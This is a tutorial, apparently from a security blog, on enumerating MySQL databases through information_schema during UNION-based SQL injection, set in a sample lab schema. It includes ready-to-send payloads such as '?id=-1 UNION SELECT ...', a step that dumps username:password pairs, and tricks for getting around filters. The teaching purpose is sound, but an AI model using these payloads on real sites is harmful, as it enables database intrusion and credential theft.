SQL Injection: information_schema

When learning SQL injection, the example that comes up most often is the classic PHP + MySQL combination. Within that, one thing is mentioned just as often: the built-in database that MySQL has shipped since version 5.0, information_schema.

A quick look at what the information_schema database contains.

Two of its tables are the ones you care about during injection: tables and columns. (A third, schemata, lists the database names themselves and is the usual first step when the target database is not yet known.)

mysql> use information_schema
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| INNODB_BUFFER_PAGE                    |
| INNODB_TRX                            |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_LOCK_WAITS                     |
| INNODB_CMPMEM                         |
| INNODB_CMP                            |
| INNODB_LOCKS                          |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_BUFFER_PAGE_LRU                |
+---------------------------------------+
40 rows in set (0.00 sec)

The tables table records which table belongs to which database. It has many columns (engine, table_rows and so on), but the two that matter for enumeration are table_schema (the database name) and table_name.

With select table_schema, table_name from tables you can list every database/table pair on the whole MySQL server. Note that this really is all of them, or more precisely all of them the current account has some privilege on, since information_schema only exposes objects the connecting user is allowed to see. To restrict the listing to one database, add a where condition:

mysql> select table_schema, table_name from tables where table_schema='security';
+--------------+------------+
| table_schema | table_name |
+--------------+------------+
| security     | emails     |
| security     | referers   |
| security     | uagents    |
| security     | users      |
+--------------+------------+
4 rows in set (0.00 sec)

The other table, columns, has the three fields we need: table_schema, table_name and column_name. (Like tables it carries many more, such as data_type and ordinal_position, but these three are enough to locate a column.)

mysql> select table_schema, table_name, column_name from columns where table_schema='security' and table_name='users';
+--------------+------------+-------------+
| table_schema | table_name | column_name |
+--------------+------------+-------------+
| security     | users      | id          |
| security     | users      | username    |
| security     | users      | password    |
+--------------+------------+-------------+
3 rows in set (0.01 sec)

How this is written once carried into a UNION query. The UNION must select the same number of columns as the original query (three here), and database() returns the name of the database the vulnerable query is running in, which saves having to know it in advance:

mysql> select id, username, password from users where id = 1 union select table_schema, table_name, column_name from information_schema.columns where table_schema=database() and table_name='users';
+----------+----------+----------+
| id       | username | password |
+----------+----------+----------+
| 1        | Dumb     | Dumb     |
| security | users    | id       |
| security | users    | username |
| security | users    | password |
+----------+----------+----------+
4 rows in set (0.00 sec)

The first row is the legitimate result for id = 1; the three rows after it come from information_schema. In a real injection everything after "where id =" is what the attacker supplies through the id parameter, and the web page renders whichever of these rows it was written to display (often only the first one).
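The full enumeration chain as one runnable script, added here as an example and not part of the original post. It recreates a minimal security.users table (the Dumb row is the one shown above; the other two rows are constructed sample data) and then walks schemata, tables, columns and finally the data, each step through the same three-column UNION. Two practitioner tricks that the post does not use are added: where id = -1, so no legitimate row occupies the single slot a page typically displays, and group_concat(), which collapses many result rows into one cell; a row-at-a-time LIMIT/OFFSET fallback is shown for when the concatenated output is truncated or the function is filtered.

```sql
-- Added example (not from the original post). Written for MySQL 5.5+ / 8.0.
-- Rebuild the minimal schema so the script runs stand-alone.
DROP DATABASE IF EXISTS security;
CREATE DATABASE security;
USE security;

CREATE TABLE users (
  id       INT PRIMARY KEY,
  username VARCHAR(20) NOT NULL,
  password VARCHAR(40) NOT NULL
);

-- Row 1 is the row displayed in the post; rows 2 and 3 are constructed sample data.
INSERT INTO users VALUES
  (1, 'Dumb',  'Dumb'),
  (2, 'alice', 'hunter2'),
  (3, 'bob',   'correct-horse');

-- The vulnerable query is:  SELECT id, username, password FROM users WHERE id = <input>
-- Everything after "WHERE id =" in the statements below is what an attacker sends as the
-- id parameter, e.g. ?id=-1 UNION SELECT 1,GROUP_CONCAT(schema_name),3 FROM information_schema.schemata
-- (with a quoted input it becomes ?id=-1' UNION SELECT ... -- - instead).
-- id = -1 matches nothing, so the UNION row is the first and only row the page renders.

-- Step 1: database names. Column 2 (username) is used as the output slot; 1 and 3
-- are fillers that only exist to match the column count of the original query.
SELECT id, username, password FROM users WHERE id = -1
UNION SELECT 1, GROUP_CONCAT(schema_name), 3
      FROM information_schema.schemata;

-- Step 2: tables in the database the vulnerable query runs in.
SELECT id, username, password FROM users WHERE id = -1
UNION SELECT 1, GROUP_CONCAT(table_name), 3
      FROM information_schema.tables
      WHERE table_schema = DATABASE();

-- Step 2 (fallback): one table per request, for when GROUP_CONCAT output is cut off
-- at group_concat_max_len (1024 bytes by default) or the function is filtered.
-- Increase OFFSET by one per request until the slot comes back empty.
SELECT id, username, password FROM users WHERE id = -1
UNION SELECT 1, table_name, 3
      FROM information_schema.tables
      WHERE table_schema = DATABASE()
      LIMIT 1 OFFSET 0;

-- Step 3: columns of the chosen table, in their defined order.
SELECT id, username, password FROM users WHERE id = -1
UNION SELECT 1, GROUP_CONCAT(column_name ORDER BY ordinal_position), 3
      FROM information_schema.columns
      WHERE table_schema = DATABASE() AND table_name = 'users';

-- Step 4: the data itself. 0x3a is ':' written as a hex literal, which avoids
-- needing a quote character inside the payload.
SELECT id, username, password FROM users WHERE id = -1
UNION SELECT 1, GROUP_CONCAT(username, 0x3a, password ORDER BY id SEPARATOR ' | '), 3
      FROM users;
```

Each statement returns exactly one row whose username slot carries the enumerated list for that step, which is what makes the chain work against a page that shows a single record. The fillers 1 and 3 are only there to satisfy the column count; if the page displays a different column, move the GROUP_CONCAT into that position instead.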